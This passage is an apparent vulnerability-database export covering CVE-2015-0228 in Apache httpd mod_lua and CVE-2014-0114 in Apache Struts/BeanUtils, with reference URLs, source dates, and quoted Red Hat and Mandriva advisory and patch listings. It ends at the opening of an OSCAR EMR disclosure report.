"https://support.apple.com/en-us/HT205219", }, { title: "HT205031", trust: 0.8, url: "http://support.apple.com/en-us/HT205031", }, { title: "HT205219", trust: 0.8, url: "http://support.apple.com/ja-jp/HT205219", }, { title: "HT205031", trust: 0.8, url: "http://support.apple.com/ja-jp/HT205031", }, { title: "Apache 2.4.13", trust: 0.8, url: "http://svn.apache.org/repos/asf/httpd/httpd/branches/2.4.x/CHANGES", }, { title: "*) SECURITY: CVE-2015-0228 (cve.mitre.org)", trust: 0.8, url: "https://github.com/apache/httpd/commit/643f0fcf3b8ab09a68f0ecd2aa37aafeda3e63ef", }, { title: "Oracle Critical Patch Update Advisory - July 2016", trust: 0.8, url: "http://www.oracle.com/technetwork/security-advisory/cpujul2016-2881720.html", }, { title: "Text Form of Oracle Critical Patch Update - July 2016 Risk Matrices", trust: 0.8, url: 
"http://www.oracle.com/technetwork/topics/security/cpujul2016verbose-2881721.html", }, { title: "Oracle Solaris Third Party Bulletin - October 2015", trust: 0.8, url: "http://www.oracle.com/technetwork/topics/security/bulletinoct2015-2511968.html", }, { title: "July 2016 Critical Patch Update Released", trust: 0.8, url: "http://blogs.oracle.com/security/entry/july_2016_critical_patch_update", }, { title: "modules-lua-lua_request.c", trust: 0.6, url: "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=54055", }, { title: "Red Hat: CVE-2015-0228", trust: 0.1, url: "https://vulmon.com/vendoradvisory?qidtp=red_hat_cve_database&qid=CVE-2015-0228", }, { title: "Amazon Linux AMI: ALAS-2015-579", trust: 0.1, url: "https://vulmon.com/vendoradvisory?qidtp=amazon_linux_ami&qid=ALAS-2015-579", }, { title: "Ubuntu Security Notice: apache2 vulnerabilities", trust: 0.1, url: "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice&qid=USN-2523-1", }, { title: "DC-2: Vulnhub Walkthrough", trust: 0.1, url: "https://github.com/vshaliii/DC-2-Vulnhub-Walkthrough ", }, { title: "Requirements\nvulnsearch-cve\nUsage\nvulnsearch\nUsage\nTest Sample", trust: 0.1, url: "https://github.com/kasem545/vulnsearch ", }, { title: "Shodan Search Script", trust: 0.1, url: "https://github.com/firatesatoglu/shodanSearch ", }, ], sources: [ { db: "VULMON", id: "CVE-2015-0228", }, { db: "JVNDB", id: "JVNDB-2015-001673", }, { db: "CNNVD", id: "CNNVD-201503-136", }, ], }, problemtype_data: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: [ { problemtype: "CWE-20", trust: 1.9, }, ], sources: [ { db: "VULHUB", id: "VHN-78174", }, { db: "JVNDB", id: "JVNDB-2015-001673", }, { db: "NVD", id: "CVE-2015-0228", }, ], }, references: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", data: { "@container": "@list", }, sources: { "@container": "@list", 
"@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: [ { trust: 2.7, url: "http://advisories.mageia.org/mgasa-2015-0099.html", }, { trust: 2.4, url: "http://www.oracle.com/technetwork/security-advisory/cpujul2016-2881720.html", }, { trust: 2.1, url: "http://www.oracle.com/technetwork/topics/security/linuxbulletinjan2016-2867209.html", }, { trust: 1.9, url: "http://rhn.redhat.com/errata/rhsa-2015-1666.html", }, { trust: 1.9, url: "http://www.ubuntu.com/usn/usn-2523-1", }, { trust: 1.8, url: "http://lists.apple.com/archives/security-announce/2015/aug/msg00001.html", }, { trust: 1.8, url: "http://lists.apple.com/archives/security-announce/2015/sep/msg00004.html", }, { trust: 1.8, url: "http://www.securityfocus.com/bid/73041", }, { trust: 1.8, url: "http://www.securityfocus.com/bid/91787", }, { trust: 1.8, url: "https://support.apple.com/ht205219", }, { trust: 1.8, url: "https://support.apple.com/kb/ht205031", }, { trust: 1.8, url: "http://www.securitytracker.com/id/1032967", }, { trust: 1.8, url: "http://lists.opensuse.org/opensuse-updates/2015-03/msg00006.html", }, { trust: 1.2, url: "http://svn.apache.org/repos/asf/httpd/httpd/branches/2.4.x/changes", }, { trust: 1.2, url: "https://github.com/apache/httpd/commit/643f0fcf3b8ab09a68f0ecd2aa37aafeda3e63ef", }, { trust: 1.2, url: "https://github.com/apache/httpd/commit/78eb3b9235515652ed141353d98c239237030410", }, { trust: 1.1, url: "https://lists.apache.org/thread.html/56c2e7cc9deb1c12a843d0dc251ea7fd3e7e80293cde02fcd65286ba%40%3ccvs.httpd.apache.org%3e", }, { trust: 1.1, url: "https://lists.apache.org/thread.html/84a3714f0878781f6ed84473d1a503d2cc382277e100450209231830%40%3ccvs.httpd.apache.org%3e", }, { trust: 1.1, url: "https://lists.apache.org/thread.html/rd18c3c43602e66f9cdcf09f1de233804975b9572b0456cc582390b6f%40%3ccvs.httpd.apache.org%3e", }, { trust: 1.1, url: "https://lists.apache.org/thread.html/re3d27b6250aa8548b8845d314bb8a350b3df326cacbbfdfe4d455234%40%3ccvs.httpd.apache.org%3e", 
}, { trust: 1.1, url: "https://lists.apache.org/thread.html/rf6449464fd8b7437704c55f88361b66f12d5b5f90bcce66af4be4ba9%40%3ccvs.httpd.apache.org%3e", }, { trust: 1.1, url: "https://lists.apache.org/thread.html/ra7f6aeb28661fbf826969526585f16856abc4615877875f9d3b35ef4%40%3ccvs.httpd.apache.org%3e", }, { trust: 1.1, url: "https://lists.apache.org/thread.html/rc998b18880df98bafaade071346690c2bc1444adaa1a1ea464b93f0a%40%3ccvs.httpd.apache.org%3e", }, { trust: 1.1, url: "https://lists.apache.org/thread.html/r83109088737656fa6307bd99ab40f8ff0269ae58d3f7272d7048494a%40%3ccvs.httpd.apache.org%3e", }, { trust: 1.1, url: "https://lists.apache.org/thread.html/r9f93cf6dde308d42a9c807784e8102600d0397f5f834890708bf6920%40%3ccvs.httpd.apache.org%3e", }, { trust: 1.1, url: "https://lists.apache.org/thread.html/rcc44594d4d6579b90deccd4536b5d31f099ef563df39b094be286b9e%40%3ccvs.httpd.apache.org%3e", }, { trust: 1.1, url: "https://lists.apache.org/thread.html/rb14daf9cc4e28d18cdc15d6a6ca74e565672fabf7ad89541071d008b%40%3ccvs.httpd.apache.org%3e", }, { trust: 1.1, url: "https://lists.apache.org/thread.html/r76142b8c5119df2178be7c2dba88fde552eedeec37ea993dfce68d1d%40%3ccvs.httpd.apache.org%3e", }, { trust: 1, url: "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-0228", }, { trust: 0.8, url: "http://jvn.jp/vu/jvnvu99970459/index.html", }, { trust: 0.8, url: "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2015-0228", }, { trust: 0.6, url: "httpd.apache.org%3e", }, { trust: 0.6, url: "https://lists.apache.org/thread.html/re3d27b6250aa8548b8845d314bb8a350b3df326cacbbfdfe4d455234@%3ccvs.", }, { trust: 0.6, url: "httpd/commit/643f0fcf3b8ab09a68f0ecd2aa37aafeda3e63ef", }, { trust: 0.6, url: "https://github.com/apache/", }, { trust: 0.6, url: "https://lists.apache.org/thread.html/rb14daf9cc4e28d18cdc15d6a6ca74e565672fabf7ad89541071d008b@%3ccvs.", }, { trust: 0.6, url: "https://lists.apache.org/thread.html/rc998b18880df98bafaade071346690c2bc1444adaa1a1ea464b93f0a@%3ccvs.", }, { 
trust: 0.6, url: "https://lists.apache.org/thread.html/84a3714f0878781f6ed84473d1a503d2cc382277e100450209231830@%3ccvs.", }, { trust: 0.6, url: "https://lists.apache.org/thread.html/r76142b8c5119df2178be7c2dba88fde552eedeec37ea993dfce68d1d@%3ccvs.", }, { trust: 0.6, url: "https://lists.apache.org/thread.html/rf6449464fd8b7437704c55f88361b66f12d5b5f90bcce66af4be4ba9@%3ccvs.", }, { trust: 0.6, url: "https://lists.apache.org/thread.html/rd18c3c43602e66f9cdcf09f1de233804975b9572b0456cc582390b6f@%3ccvs.", }, { trust: 0.6, url: "https://lists.apache.org/thread.html/r9f93cf6dde308d42a9c807784e8102600d0397f5f834890708bf6920@%3ccvs.", }, { trust: 0.6, url: "https://lists.apache.org/thread.html/r83109088737656fa6307bd99ab40f8ff0269ae58d3f7272d7048494a@%3ccvs.", }, { trust: 0.6, url: "https://lists.apache.org/thread.html/rcc44594d4d6579b90deccd4536b5d31f099ef563df39b094be286b9e@%3ccvs.", }, { trust: 0.6, url: "https://lists.apache.org/thread.html/56c2e7cc9deb1c12a843d0dc251ea7fd3e7e80293cde02fcd65286ba@%3ccvs.", }, { trust: 0.6, url: "httpd/branches/2.4.x/changes", }, { trust: 0.6, url: "http://svn.apache.org/repos/asf/", }, { trust: 0.6, url: "httpd/commit/78eb3b9235515652ed141353d98c239237030410", }, { trust: 0.6, url: "https://lists.apache.org/thread.html/ra7f6aeb28661fbf826969526585f16856abc4615877875f9d3b35ef4@%3ccvs.", }, { trust: 0.5, url: "https://nvd.nist.gov/vuln/detail/cve-2015-0228", }, { trust: 0.3, url: "http://www.oracle.com", }, { trust: 0.3, url: "http://support.citrix.com/article/ctx216642", }, { trust: 0.3, url: "http://www-01.ibm.com/support/docview.wss?uid=swg21984819", }, { trust: 0.3, url: "http://www-01.ibm.com/support/docview.wss?uid=swg21988710", }, { trust: 0.3, url: "http://httpd.apache.org/", }, { trust: 0.3, url: "svn.apache.org/repos/asf/httpd/httpd/branches/2.4.x/changes", }, { trust: 0.3, url: "http://prod.lists.apple.com/archives/security-announce/2015/aug/msg00001.html", }, { trust: 0.3, url: "https://nvd.nist.gov/vuln/detail/cve-2014-8109", 
}, { trust: 0.3, url: "https://nvd.nist.gov/vuln/detail/cve-2014-3581", }, { trust: 0.3, url: "https://nvd.nist.gov/vuln/detail/cve-2015-3183", }, { trust: 0.3, url: "https://nvd.nist.gov/vuln/detail/cve-2015-3185", }, { trust: 0.3, url: "https://nvd.nist.gov/vuln/detail/cve-2015-0253", }, { trust: 0.2, url: "https://access.redhat.com/security/cve/cve-2015-0228", }, { trust: 0.2, url: "https://nvd.nist.gov/vuln/detail/cve-2014-3583", }, { trust: 0.2, url: "https://nvd.nist.gov/vuln/detail/cve-2013-5704", }, { trust: 0.1, url: "https://lists.apache.org/thread.html/84a3714f0878781f6ed84473d1a503d2cc382277e100450209231830@%3ccvs.httpd.apache.org%3e", }, { trust: 0.1, url: "https://lists.apache.org/thread.html/56c2e7cc9deb1c12a843d0dc251ea7fd3e7e80293cde02fcd65286ba@%3ccvs.httpd.apache.org%3e", }, { trust: 0.1, url: "https://lists.apache.org/thread.html/rd18c3c43602e66f9cdcf09f1de233804975b9572b0456cc582390b6f@%3ccvs.httpd.apache.org%3e", }, { trust: 0.1, url: "https://lists.apache.org/thread.html/re3d27b6250aa8548b8845d314bb8a350b3df326cacbbfdfe4d455234@%3ccvs.httpd.apache.org%3e", }, { trust: 0.1, url: "https://lists.apache.org/thread.html/rf6449464fd8b7437704c55f88361b66f12d5b5f90bcce66af4be4ba9@%3ccvs.httpd.apache.org%3e", }, { trust: 0.1, url: "https://lists.apache.org/thread.html/ra7f6aeb28661fbf826969526585f16856abc4615877875f9d3b35ef4@%3ccvs.httpd.apache.org%3e", }, { trust: 0.1, url: "https://lists.apache.org/thread.html/rc998b18880df98bafaade071346690c2bc1444adaa1a1ea464b93f0a@%3ccvs.httpd.apache.org%3e", }, { trust: 0.1, url: "https://lists.apache.org/thread.html/rcc44594d4d6579b90deccd4536b5d31f099ef563df39b094be286b9e@%3ccvs.httpd.apache.org%3e", }, { trust: 0.1, url: "https://lists.apache.org/thread.html/r9f93cf6dde308d42a9c807784e8102600d0397f5f834890708bf6920@%3ccvs.httpd.apache.org%3e", }, { trust: 0.1, url: "https://lists.apache.org/thread.html/rb14daf9cc4e28d18cdc15d6a6ca74e565672fabf7ad89541071d008b@%3ccvs.httpd.apache.org%3e", }, { trust: 0.1, url: 
"https://lists.apache.org/thread.html/r83109088737656fa6307bd99ab40f8ff0269ae58d3f7272d7048494a@%3ccvs.httpd.apache.org%3e", }, { trust: 0.1, url: "https://lists.apache.org/thread.html/r76142b8c5119df2178be7c2dba88fde552eedeec37ea993dfce68d1d@%3ccvs.httpd.apache.org%3e", }, { trust: 0.1, url: "https://cwe.mitre.org/data/definitions/20.html", }, { trust: 0.1, url: "https://nvd.nist.gov", }, { trust: 0.1, url: "https://usn.ubuntu.com/2523-1/", }, { trust: 0.1, url: "https://launchpad.net/ubuntu/+source/apache2/2.4.10-1ubuntu1.1", }, { trust: 0.1, url: "https://launchpad.net/ubuntu/+source/apache2/2.2.22-1ubuntu1.8", }, { trust: 0.1, url: "https://launchpad.net/ubuntu/+source/apache2/2.4.7-1ubuntu4.4", }, { trust: 0.1, url: "https://launchpad.net/ubuntu/+source/apache2/2.2.14-5ubuntu8.15", }, { trust: 0.1, url: "http://advisories.mageia.org/mgasa-2014-0305.html", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2013-6438", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2014-0118", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2014-0226", }, { trust: 0.1, url: "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-0231", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2014-5704", }, { trust: 0.1, url: "http://advisories.mageia.org/mgasa-2014-0527.html", }, { trust: 0.1, url: "http://www.mandriva.com/en/support/security/", }, { trust: 0.1, url: "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-5704", }, { trust: 0.1, url: "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-0118", }, { trust: 0.1, url: "http://advisories.mageia.org/mgasa-2014-0135.html", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2014-0098", }, { trust: 0.1, url: "http://www.mandriva.com/en/support/security/advisories/", }, { trust: 0.1, url: "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-8109", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2014-0117", }, { trust: 0.1, url: 
"http://advisories.mageia.org/mgasa-2015-0011.html", }, { trust: 0.1, url: "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-6438", }, { trust: 0.1, url: "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-0098", }, { trust: 0.1, url: "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-0226", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2014-0231", }, { trust: 0.1, url: "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-3581", }, { trust: 0.1, url: "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-0117", }, { trust: 0.1, url: "https://www.redhat.com/mailman/listinfo/rhsa-announce", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2015-3185", }, { trust: 0.1, url: "https://access.redhat.com/security/team/contact/", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2015-3183", }, { trust: 0.1, url: "https://bugzilla.redhat.com/):", }, { trust: 0.1, url: "https://access.redhat.com/security/team/key/", }, { trust: 0.1, url: "https://access.redhat.com/articles/11258", }, { trust: 0.1, url: "https://access.redhat.com/security/updates/classification/#moderate", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2015-0253", }, { trust: 0.1, url: "https://support.apple.com/kb/ht201222", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2014-8161", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2014-8500", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2015-0242", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2015-0241", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2015-0243", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2015-1349", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2015-5911", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2015-3166", }, { trust: 0.1, url: "https://www.apple.com/support/security/pgp/", }, { trust: 0.1, url: 
"https://nvd.nist.gov/vuln/detail/cve-2015-3165", }, { trust: 0.1, url: "http://gpgtools.org", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2014-0067", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2015-3167", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2015-0244", }, { trust: 0.1, url: "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-3183", }, { trust: 0.1, url: "http://slackware.com", }, { trust: 0.1, url: "http://osuosl.org)", }, { trust: 0.1, url: "http://slackware.com/gpg-key", }, { trust: 0.1, url: "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-0253", }, { trust: 0.1, url: "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-3185", }, ], sources: [ { db: "VULHUB", id: "VHN-78174", }, { db: "VULMON", id: "CVE-2015-0228", }, { db: "BID", id: "91787", }, { db: "BID", id: "73041", }, { db: "JVNDB", id: "JVNDB-2015-001673", }, { db: "PACKETSTORM", id: "130735", }, { db: "PACKETSTORM", id: "131098", }, { db: "PACKETSTORM", id: "133281", }, { db: "PACKETSTORM", id: "133619", }, { db: "PACKETSTORM", id: "132743", }, { db: "CNNVD", id: "CNNVD-201503-136", }, { db: "NVD", id: "CVE-2015-0228", }, ], }, sources: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", data: { "@container": "@list", }, }, data: [ { db: "VULHUB", id: "VHN-78174", }, { db: "VULMON", id: "CVE-2015-0228", }, { db: "BID", id: "91787", }, { db: "BID", id: "73041", }, { db: "JVNDB", id: "JVNDB-2015-001673", }, { db: "PACKETSTORM", id: "130735", }, { db: "PACKETSTORM", id: "131098", }, { db: "PACKETSTORM", id: "133281", }, { db: "PACKETSTORM", id: "133619", }, { db: "PACKETSTORM", id: "132743", }, { db: "CNNVD", id: "CNNVD-201503-136", }, { db: "NVD", id: "CVE-2015-0228", }, ], }, sources_release_date: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", data: { "@container": "@list", }, }, data: [ { date: "2015-03-08T00:00:00", db: "VULHUB", id: "VHN-78174", }, { date: "2015-03-08T00:00:00", db: 
"VULMON", id: "CVE-2015-0228", }, { date: "2016-07-15T00:00:00", db: "BID", id: "91787", }, { date: "2015-03-11T00:00:00", db: "BID", id: "73041", }, { date: "2015-03-10T00:00:00", db: "JVNDB", id: "JVNDB-2015-001673", }, { date: "2015-03-10T16:02:55", db: "PACKETSTORM", id: "130735", }, { date: "2015-03-30T21:25:14", db: "PACKETSTORM", id: "131098", }, { date: "2015-08-24T22:06:47", db: "PACKETSTORM", id: "133281", }, { date: "2015-09-19T15:37:27", db: "PACKETSTORM", id: "133619", }, { date: "2015-07-20T15:45:36", db: "PACKETSTORM", id: "132743", }, { date: "2015-03-09T00:00:00", db: "CNNVD", id: "CNNVD-201503-136", }, { date: "2015-03-08T02:59:00.073000", db: "NVD", id: "CVE-2015-0228", }, ], }, sources_update_date: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", data: { "@container": "@list", }, }, data: [ { date: "2020-10-27T00:00:00", db: "VULHUB", id: "VHN-78174", }, { date: "2023-11-07T00:00:00", db: "VULMON", id: "CVE-2015-0228", }, { date: "2018-10-15T09:00:00", db: "BID", id: "91787", }, { date: "2016-07-20T12:03:00", db: "BID", id: "73041", }, { date: "2016-07-27T00:00:00", db: "JVNDB", id: "JVNDB-2015-001673", }, { date: "2021-06-07T00:00:00", db: "CNNVD", id: "CNNVD-201503-136", }, { date: "2024-11-21T02:22:35.930000", db: "NVD", id: "CVE-2015-0228", }, ], }, threat_type: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: "remote", sources: [ { db: "PACKETSTORM", id: "130735", }, { db: "PACKETSTORM", id: "133281", }, { db: "CNNVD", id: "CNNVD-201503-136", }, ], trust: 0.8, }, title: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: "Apache HTTP Server of mod_lua Service disruption in modules (DoS) Vulnerabilities", sources: [ { db: "JVNDB", id: 
"JVNDB-2015-001673", }, ], trust: 0.8, }, type: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: "input validation error", sources: [ { db: "CNNVD", id: "CNNVD-201503-136", }, ], trust: 0.6, }, }
var-201404-0288
Vulnerability from variot
Apache Commons BeanUtils, as distributed in lib/commons-beanutils-1.8.0.jar in Apache Struts 1.x through 1.3.10 and in other products requiring commons-beanutils through 1.9.2, does not suppress the class property, which allows remote attackers to "manipulate" the ClassLoader and execute arbitrary code via the class parameter, as demonstrated by the passing of this parameter to the getClass method of the ActionForm object in Struts 1. Apache Struts is prone to a security-bypass vulnerability because it fails to adequately handle user-supplied input. An attacker can exploit this issue to bypass certain security restrictions and perform unauthorized actions. This may lead to further attacks. Apache Struts versions 1.0.0 through 1.3.10 are vulnerable.
Security Fix(es):
-
Apache Struts 1: Class Loader manipulation via request parameters (CVE-2014-0114)
-
thrift: Improper file path sanitization in t_go_generator.cc:format_go_output() of the go client library can allow an attacker to inject commands (CVE-2016-5397)
-
slf4j: Deserialisation vulnerability in EventData constructor can allow for arbitrary code execution (CVE-2018-8088)
-
jolokia: JMX proxy mode vulnerable to remote code execution (CVE-2018-1000130)
-
bouncycastle: DSA does not fully validate ASN.1 encoding during signature verification allowing for injection of unsigned data (CVE-2016-1000338)
-
bouncycastle: Information leak in AESFastEngine class (CVE-2016-1000339)
-
bouncycastle: Information exposure in DSA signature generation via timing attack (CVE-2016-1000341)
-
bouncycastle: ECDSA improper validation of ASN.1 encoding of signature (CVE-2016-1000342)
-
bouncycastle: DHIES implementation allowed the use of ECB mode (CVE-2016-1000344)
-
bouncycastle: DHIES/ECIES CBC modes are vulnerable to padding oracle attack (CVE-2016-1000345)
-
bouncycastle: Other party DH public keys are not fully validated (CVE-2016-1000346)
-
bouncycastle: ECIES implementation allowed the use of ECB mode (CVE-2016-1000352)
-
async-http-client: Invalid URL parsing with '?' (CVE-2017-14063)
-
undertow: File descriptor leak caused by JarURLConnection.getLastModified() allows attacker to cause a denial of service (CVE-2018-1114)
-
spring-framework: Directory traversal vulnerability with static resources on Windows filesystems (CVE-2018-1271)
-
tika: Infinite loop in BPGParser can allow remote attacker to cause a denial of service (CVE-2018-1338)
-
tika: Infinite loop in ChmParser can allow remote attacker to cause a denial of service (CVE-2018-1339)
-
pdfbox: Infinite loop in AFMParser.java allows for out of memory errors via crafted PDF (CVE-2018-8036)
-
jolokia: Cross site scripting in the HTTP servlet (CVE-2018-1000129)
-
bouncycastle: flaw in the low-level interface to RSA key pair generator (CVE-2018-1000180)
-
bouncycastle: Carry propagation bug in math.raw.Nat??? class (CVE-2016-1000340)
-
bouncycastle: DSA key pair generator generates a weak private key by default (CVE-2016-1000343)
-
spring-framework: Multipart content pollution (CVE-2018-1272)
For more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section.
Red Hat would like to thank Chris McCown for reporting CVE-2018-8088.
Installation instructions are located in the download section of the customer portal. Bugs fixed (https://bugzilla.redhat.com/):
1091938 - CVE-2014-0114 Apache Struts 1: Class Loader manipulation via request parameters 1487563 - CVE-2017-14063 async-http-client: Invalid URL parsing with '?' 1544620 - CVE-2016-5397 thrift: Improper file path sanitization in t_go_generator.cc:format_go_output() of the go client library can allow an attacker to inject commands 1548909 - CVE-2018-8088 slf4j: Deserialisation vulnerability in EventData constructor can allow for arbitrary code execution 1559316 - CVE-2018-1000130 jolokia: JMX proxy mode vulnerable to remote code execution 1559317 - CVE-2018-1000129 jolokia: Cross site scripting in the HTTP servlet 1564408 - CVE-2018-1272 spring-framework: Multipart content pollution 1571050 - CVE-2018-1271 spring-framework: Directory traversal vulnerability with static resources on Windows filesystems 1572421 - CVE-2018-1338 tika: Infinite loop in BPGParser can allow remote attacker to cause a denial of service 1572424 - CVE-2018-1339 tika: Infinite loop in ChmParser can allow remote attacker to cause a denial of service 1573045 - CVE-2018-1114 undertow: File descriptor leak caused by JarURLConnection.getLastModified() allows attacker to cause a denial of service 1588306 - CVE-2018-1000180 bouncycastle: flaw in the low-level interface to RSA key pair generator 1588313 - CVE-2016-1000338 bouncycastle: DSA does not fully validate ASN.1 encoding during signature verification allowing for injection of unsigned data 1588314 - CVE-2016-1000344 bouncycastle: DHIES implementation allowed the use of ECB mode 1588323 - CVE-2016-1000345 bouncycastle: DHIES/ECIES CBC modes are vulnerable to padding oracle attack 1588327 - CVE-2016-1000346 bouncycastle: Other party DH public keys are not fully validated 1588330 - CVE-2016-1000352 bouncycastle: ECIES implementation allowed the use of ECB mode 1588688 - CVE-2016-1000340 bouncycastle: Carry propagation bug in math.raw.Nat??? 
class 1588695 - CVE-2016-1000339 bouncycastle: Information leak in AESFastEngine class 1588708 - CVE-2016-1000341 bouncycastle: Information exposure in DSA signature generation via timing attack 1588715 - CVE-2016-1000342 bouncycastle: ECDSA improper validation of ASN.1 encoding of signature 1588721 - CVE-2016-1000343 bouncycastle: DSA key pair generator generates a weak private key by default 1597490 - CVE-2018-8036 pdfbox: Infinite loop in AFMParser.java allows for out of memory errors via crafted PDF
- Summary:
Fuse ESB Enterprise 7.1.0 R1 P4 (Patch 4 on Rollup Patch 1), a security update that addresses one security issue, is now available from the Red Hat Customer Portal. A remote attacker could use this flaw to manipulate the ClassLoader used by an application server running Struts 1. This could lead to remote code execution under certain conditions. (CVE-2014-0114)
Refer to the readme.txt file included with the patch files for installation instructions.
References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0114 http://advisories.mageia.org/MGASA-2014-0219.html
Updated Packages:
Mandriva Enterprise Server 5: 2341ea3fd6c92a10ab4c0be7ef5ca9da mes5/i586/struts-1.2.9-6.1mdvmes5.2.i586.rpm 8d911347cc4fdb08383a2d6ad21860e6 mes5/i586/struts-javadoc-1.2.9-6.1mdvmes5.2.i586.rpm fc1e7ac540a1d4c923cf773769c976b2 mes5/i586/struts-manual-1.2.9-6.1mdvmes5.2.i586.rpm 3304297e4b88aae688e8edcdd11bf478 mes5/i586/struts-webapps-tomcat5-1.2.9-6.1mdvmes5.2.i586.rpm b508c226756fcb2a82a8b5e2e84af466 mes5/SRPMS/struts-1.2.9-6.1mdvmes5.2.src.rpm
Mandriva Enterprise Server 5/X86_64: 7e2abd47c0862fa5010ee686d76d2353 mes5/x86_64/struts-1.2.9-6.1mdvmes5.2.x86_64.rpm 96dd8e36bf4b46577498ad8616dce319 mes5/x86_64/struts-javadoc-1.2.9-6.1mdvmes5.2.x86_64.rpm 37a1b595d7f2f73bdff8d13bcb70e0a6 mes5/x86_64/struts-manual-1.2.9-6.1mdvmes5.2.x86_64.rpm 8c298a1e1e9e8ad81acb0166b2f18109 mes5/x86_64/struts-webapps-tomcat5-1.2.9-6.1mdvmes5.2.x86_64.rpm b508c226756fcb2a82a8b5e2e84af466 mes5/SRPMS/struts-1.2.9-6.1mdvmes5.2.src.rpm
Mandriva Business Server 1/X86_64: 1e1b9440affefd05d5fe0c4860fdcd9b mbs1/x86_64/struts-1.3.10-3.1.mbs1.noarch.rpm 5ae68b0b7f991676f67562a51dd956a7 mbs1/x86_64/struts-javadoc-1.3.10-3.1.mbs1.noarch.rpm f135f96b6d2121b157b7a62afd449ea6 mbs1/SRPMS/struts-1.3.10-3.1.mbs1.src.rpm
To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you.
All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing:
gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98
You can view other update advisories for Mandriva Linux at:
http://www.mandriva.com/en/support/security/advisories/
If you want to report vulnerabilities, please contact
security_(at)_mandriva.com
Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.12 (GNU/Linux)
iD8DBQFTdeNbmqjQ0CJFipgRAo5XAJ4oaaS6iRfHSPHEO3og+Se4kWkdfgCgrhMb HUtc9GTxbEwte2/fTU7bJ5M= =5Ewj -----END PGP SIGNATURE----- . Title: Multiple vulnerabilities in OSCAR EMR Product: OSCAR EMR Vendor: Oscar McMaster Tested version: 15.21beta361 Remediation status: Unknown Reported by: Brian D. Hysell
Product Description:
"OSCAR is open-source Electronic Medical Record (EMR) software that was first developed at McMaster University by Dr. David Chan. It is continuously enriched by contributions from OSCAR users and the Charter OSCAR Service Providers that support them. OSCAR has been certified by OntarioMD, and verified as IHE compliant, achievements made possible by the creation and success of OSCAR EMR's ISO 13485:2003 certified Quality Management System."
Timeline:
29 Mar 2016 - Vendor contacted 29 Mar 2016 - Vendor responded 29 Apr 2016 - Vendor contacted for permission to share redacted report with third party 02 May 2016 - Vendor responded 17 Jan 2017 - Lead developer contacted (no response) 01 Jul 2018 - Vendor and lead developer contacted for follow-up, informed of intended 15 Aug disclosure (no response) 12 Aug 2018 - Alternate email address attempted for lead developer (no response) 15 Aug 2018 - Vulnerabilities publicly disclosed
Contents:
This report uses OVE identifiers: http://www.openwall.com/ove/
